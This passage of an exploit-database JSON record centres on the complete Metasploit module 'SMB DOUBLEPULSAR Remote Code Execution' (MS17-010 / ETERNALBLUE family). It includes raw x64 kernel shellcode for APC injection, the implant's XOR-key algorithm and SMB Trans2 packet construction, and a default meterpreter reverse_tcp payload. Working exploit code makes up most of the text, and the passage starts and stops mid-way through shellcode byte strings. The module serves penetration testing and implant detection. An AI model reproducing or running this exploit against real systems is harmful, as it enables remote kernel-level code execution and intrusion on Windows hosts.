\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-19] #"}, "lastseen": "2021-10-18T22:16:33", "differentElements": ["sourceData"], "edition": 48}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "0e0821bc3aa893d37b2809ffca89cdc7", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-20T08:16:37", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T08:16:37", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-20T08:16:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" 